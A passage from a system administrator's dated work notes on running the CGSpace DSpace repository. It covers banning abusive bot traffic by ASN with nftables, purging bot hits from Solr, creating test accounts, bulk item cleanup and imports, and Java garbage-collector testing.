<li>The ISPs I’ve seen so far are ChinaNet and China Unicom</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I extracted all the IPs from today and resolved them:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">'{print $1}'</span> | sort | uniq > /tmp/2022-04-18-ips.txt
|
||||
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>The top ASNs by IP are:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">2</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
|
||||
</span></span><span style="display:flex;"><span> 102 GOOGLE
|
||||
</span></span><span style="display:flex;"><span> 139 Maxihost LTDA
|
||||
</span></span><span style="display:flex;"><span> 165 AMAZON-02
|
||||
</span></span><span style="display:flex;"><span> 393 "China Mobile Communications Group Co., Ltd."
|
||||
</span></span><span style="display:flex;"><span> 473 AMAZON-AES
|
||||
</span></span><span style="display:flex;"><span> 616 China Mobile communications corporation
|
||||
</span></span><span style="display:flex;"><span> 642 M247 Ltd
|
||||
</span></span><span style="display:flex;"><span> 2336 HostRoyale Technologies Pvt Ltd
|
||||
</span></span><span style="display:flex;"><span> 4556 Chinanet
|
||||
</span></span><span style="display:flex;"><span> 5527 CHINA UNICOM China169 Backbone
|
||||
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">4</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
|
||||
</span></span><span style="display:flex;"><span> 139 262287
|
||||
</span></span><span style="display:flex;"><span> 165 16509
|
||||
</span></span><span style="display:flex;"><span> 180 204287
|
||||
</span></span><span style="display:flex;"><span> 393 9808
|
||||
</span></span><span style="display:flex;"><span> 473 14618
|
||||
</span></span><span style="display:flex;"><span> 615 56041
|
||||
</span></span><span style="display:flex;"><span> 642 9009
|
||||
</span></span><span style="display:flex;"><span> 2156 203020
|
||||
</span></span><span style="display:flex;"><span> 4556 4134
|
||||
</span></span><span style="display:flex;"><span> 5527 4837
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc</li>
|
||||
<li>I will download the IP blocks for each ASN except Google and Amazon and ban them</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
|
||||
</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">'/^$/d'</span> -e <span style="color:#e6db74">'/^#/d'</span> -e <span style="color:#e6db74">'/^{/d'</span> -e <span style="color:#e6db74">'s/deny //'</span> -e <span style="color:#e6db74">'s/;//'</span> | sort | uniq | wc -l
|
||||
</span></span><span style="display:flex;"><span>20296
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I extracted the IPv4 and IPv6 networks:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">'/^$/d'</span> -e <span style="color:#e6db74">'/^#/d'</span> -e <span style="color:#e6db74">'/^{/d'</span> -e <span style="color:#e6db74">'s/deny //'</span> -e <span style="color:#e6db74">'s/;//'</span> | grep <span style="color:#e6db74">":"</span> | sort > /tmp/ipv6-networks.txt
|
||||
</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">'/^$/d'</span> -e <span style="color:#e6db74">'/^#/d'</span> -e <span style="color:#e6db74">'/^{/d'</span> -e <span style="color:#e6db74">'s/deny //'</span> -e <span style="color:#e6db74">'s/;//'</span> | grep -v <span style="color:#e6db74">":"</span> | sort > /tmp/ipv4-networks.txt
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I suspect we need to aggregate these networks since they are so many and nftables doesn’t like it when they overlap:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wc -l /tmp/ipv4-networks.txt
|
||||
</span></span><span style="display:flex;"><span>15464 /tmp/ipv4-networks.txt
|
||||
</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv4-networks.txt | wc -l
|
||||
</span></span><span style="display:flex;"><span>2781
|
||||
</span></span><span style="display:flex;"><span>$ wc -l /tmp/ipv6-networks.txt
|
||||
</span></span><span style="display:flex;"><span>4833 /tmp/ipv6-networks.txt
|
||||
</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv6-networks.txt | wc -l
|
||||
</span></span><span style="display:flex;"><span>338
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I deployed these lists on CGSpace, ran all updates, and rebooted the server
|
||||
<ul>
|
||||
<li>This list is SURELY too broad because we will block legitimate users in China… but right now how can I discern?</li>
|
||||
<li>Also, I need to purge the hits from these 14,000 IPs in Solr when I get time</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:</li>
|
||||
</ul>
|
||||
<p><img src="/cgspace-notes/2022/04/postgres_connections_ALL-day.png" alt="PostgreSQL connections day">
|
||||
<img src="/cgspace-notes/2022/04/jmx_dspace_sessions-day.png" alt="DSpace sessions day"></p>
|
||||
<ul>
|
||||
<li>I used <code>grepcidr</code> with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">'{print $1}'</span> | sort -u > /tmp/ips.log
|
||||
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log >> /tmp/ipv4-ips.txt; <span style="color:#66d9ef">done</span> < /tmp/ipv4-networks-aggregated.txt
|
||||
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log >> /tmp/ipv6-ips.txt; <span style="color:#66d9ef">done</span> < /tmp/ipv6-networks-aggregated.txt
|
||||
</span></span><span style="display:flex;"><span># wc -l /tmp/ipv4-ips.txt
|
||||
</span></span><span style="display:flex;"><span>15313 /tmp/ipv4-ips.txt
|
||||
</span></span><span style="display:flex;"><span># wc -l /tmp/ipv6-ips.txt
|
||||
</span></span><span style="display:flex;"><span>19 /tmp/ipv6-ips.txt
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>Then I purged them from Solr using the <code>check-spider-ip-hits.sh</code>:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
|
||||
</span></span></code></pre></div><h2 id="2022-04-23">2022-04-23</h2>
|
||||
<ul>
|
||||
<li>A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the <code>example</code> file that contains most patterns
|
||||
<ul>
|
||||
<li>I updated CGSpace, then ran all system updates and rebooted the host</li>
|
||||
<li>I also ran <code>dspace cleanup -v</code> to prune the database</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<h2 id="2022-04-24">2022-04-24</h2>
|
||||
<ul>
|
||||
<li>Start a harvest on AReS</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-26">2022-03-26</h2>
|
||||
<ul>
|
||||
<li>Update dspace-statistics-api to Falcon 3.1.0 and <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.3">release v1.4.3</a></li>
|
||||
</ul>
|
||||
<h2 id="2022-03-28">2022-03-28</h2>
|
||||
<ul>
|
||||
<li>Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p <span style="color:#e6db74">'fuuuuuuuu'</span>
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I added the account to the Alliance Admins account, which should allow him to submit to any Alliance collection
|
||||
<ul>
|
||||
<li>According to my notes from <a href="/cgspace-notes/2020-10/">2020-10</a> the account must be in the admin group in order to submit via the REST API</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>Abenet and I noticed 1,735 items in CTA’s community that have the title “delete”
|
||||
<ul>
|
||||
<li>We asked Peter and he said we should delete them</li>
|
||||
<li>I exported the CTA community metadata and used OpenRefine to filter all items with the “delete” title, then used the “expunge” bulkedit action to remove them (see the sketch after this list)</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I realized I forgot to clean up the old Let’s Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
|
||||
<ul>
|
||||
<li>I also removed the pre-Ubuntu 20.04 Let’s Encrypt stuff from the Ansible infrastructure playbooks</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
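<ul>
<li>A sketch of that CTA “delete” cleanup (the community handle and eperson here are hypothetical): export the community metadata, filter the “delete” titles in OpenRefine and add an <code>action</code> column set to <code>expunge</code>, then import the CSV again:</li>
</ul>
<pre tabindex="0"><code>$ dspace metadata-export -i 10568/42211 -f /tmp/cta.csv
$ # filter in OpenRefine, add an "action" column with the value "expunge", export to /tmp/cta-expunge.csv
$ dspace metadata-import -f /tmp/cta-expunge.csv -e fuu@ummm.com
</code></pre>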
<h2 id="2022-03-29">2022-03-29</h2>
|
||||
<ul>
|
||||
<li>Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
|
||||
<ul>
|
||||
<li>I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<pre tabindex="0"><code>or(
|
||||
isNotNull(value.match('33')),
|
||||
isNotNull(value.match('179')),
|
||||
isNotNull(value.match('452')),
|
||||
isNotNull(value.match('489')),
|
||||
isNotNull(value.match('541')),
|
||||
isNotNull(value.match('568')),
|
||||
isNotNull(value.match('646')),
|
||||
isNotNull(value.match('889'))
|
||||
)
|
||||
</code></pre><ul>
|
||||
<li>Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">"-Dfile.encoding=UTF-8 -Xmx1024m"</span>
|
||||
</span></span><span style="display:flex;"><span>$ dspace import --add --eperson<span style="color:#f92672">=</span>umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-29-cgiar-tac.map
|
||||
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace filter-media -p <span style="color:#e6db74">"ImageMagick PDF Thumbnail"</span> -i 10947/50
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>After that I did some normalization on the <code>cg.subject.system</code> metadata and extracted a few dozen countries to the country field</li>
|
||||
<li>Start a harvest on AReS</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-30">2022-03-30</h2>
|
||||
<ul>
|
||||
<li>Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p <span style="color:#e6db74">'fuuuu'</span>
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I started looking into the request regarding the CIAT Library PDFs
|
||||
<ul>
|
||||
<li>There are over 4,000 links to PDFs hosted on that server in CGSpace metadata</li>
|
||||
<li>The links seem to be down though! I emailed Paola to ask</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
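<ul>
<li>To spot check whether those CIAT Library links are really down, a loop over a few of the URLs from the metadata would do (a sketch; the URL list file is hypothetical):</li>
</ul>
<pre tabindex="0"><code>$ while read -r url; do echo "$(curl -s -o /dev/null -w '%{http_code}' "$url") $url"; done < /tmp/ciat-library-urls.txt
</code></pre>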
<h2 id="2022-03-31">2022-03-31</h2>
|
||||
<ul>
|
||||
<li>Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC</li>
|
||||
<li>I will do the following for CMS and G1GC on DSpace Test:
|
||||
<ul>
|
||||
<li>Wait for startup</li>
|
||||
<li>Reload home page</li>
|
||||
<li>Log in</li>
|
||||
<li>Do a search for “livestock”</li>
|
||||
<li>Click AGROVOC facet for livestock</li>
|
||||
<li>dspace index-discovery -b</li>
|
||||
<li>dspace-statistics-api index</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>With CMS the Discovery Index took:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>real 379m19.245s
|
||||
</span></span><span style="display:flex;"><span>user 267m17.704s
|
||||
</span></span><span style="display:flex;"><span>sys 4m2.937s
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>Leroy from CIAT said that the CIAT Library server has security issues so it was limited to internal traffic
|
||||
<ul>
|
||||
<li>I extracted a list of URLs from CGSpace to send him:</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ 'https?://ciat-library') to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
|
||||
</span></span><span style="display:flex;"><span>COPY 4552
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I did some checks and cleanups in OpenRefine because there are some values with “#page” etc
|
||||
<ul>
|
||||
<li>Once I sorted them there were only ~2,700, which means there are going to be almost two thousand items with duplicate PDFs</li>
|
||||
<li>I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
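<ul>
<li>The “#page” cleanup above amounts to stripping URL fragments before de-duplicating, roughly (a sketch against the CSV exported earlier):</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c 1 /tmp/2022-03-31-ciat-library-urls.csv | sed -e '1d' -e 's/#.*$//' | sort -u | wc -l
</code></pre>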
<!-- raw HTML omitted -->